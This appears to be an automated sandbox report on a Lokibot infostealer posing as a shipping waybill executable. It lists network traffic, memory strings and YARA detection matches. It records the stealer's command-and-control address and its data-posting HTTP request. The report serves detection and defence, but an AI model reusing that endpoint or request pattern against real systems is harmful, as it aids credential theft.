                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_00404ED4 recv,3_2_00404ED4
                        Source: unknownHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 176Connection: close
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2872695096.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://45.77.223.48/~blog/?ajax=ee
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeString found in binary or memory: http://ocsp.comodoca.com0
                        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                        System Summary

                        barindex
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                        Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                        Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_055A1CC40_2_055A1CC4
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_055A01A00_2_055A01A0
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_055A0B500_2_055A0B50
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_055A0B600_2_055A0B60
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_055A2B110_2_055A2B11
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_055A1CB80_2_055A1CB8
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_056818080_2_05681808
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_056817F80_2_056817F8
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C89C880_2_07C89C88
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C801800_2_07C80180
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C856200_2_07C85620
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C835780_2_07C83578
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C82CF80_2_07C82CF8
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C84C200_2_07C84C20
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C88AF80_2_07C88AF8
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C831400_2_07C83140
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C99BC00_2_07C99BC0
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C97A200_2_07C97A20
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C9C9000_2_07C9C900
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C98D100_2_07C98D10
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C9CC180_2_07C9CC18
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C987700_2_07C98770
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C96F100_2_07C96F10
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C9BED00_2_07C9BED0
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C982A80_2_07C982A8
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C9AA600_2_07C9AA60
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C9F1480_2_07C9F148
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C9B9180_2_07C9B918
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C9BC880_2_07C9BC88
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C9D8A80_2_07C9D8A8
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C900400_2_07C90040
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C900060_2_07C90006
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_0040549C3_2_0040549C
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_004029D43_2_004029D4
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: String function: 0041219C appears 45 times
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: String function: 00405B6F appears 42 times
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 1376
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: invalid certificate
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1738264529.0000000007AA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000000.1619166037.0000000000D1C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUHN.exeX vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1739039573.0000000007FB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1735740544.0000000004C67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1733889644.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeBinary or memory string: OriginalFilenameUHN.exeX vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
